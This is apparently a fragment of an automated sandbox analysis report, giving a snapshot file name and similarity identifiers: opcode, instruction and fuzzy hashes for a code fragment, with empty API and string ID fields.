                                                                                                                                                                                              • Snapshot File: hcaresult_37_2_55c000_vsv_tool.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: cbaef350a031b0f30ea73a90b24e8774050fcc671b9a2ea6f4c83847aafd68f8
                                                                                                                                                                                              • Instruction ID: 350cee32b9b30b872786144e52d2fb47d8f692f19ce383f0f072099f17c60ebc
                                                                                                                                                                                              • Opcode Fuzzy Hash: cbaef350a031b0f30ea73a90b24e8774050fcc671b9a2ea6f4c83847aafd68f8
                                                                                                                                                                                              • Instruction Fuzzy Hash: 74A0027643071A8DDA90B6A2C069B542D50BBA4727FC260AAB8014585247F8448C8F51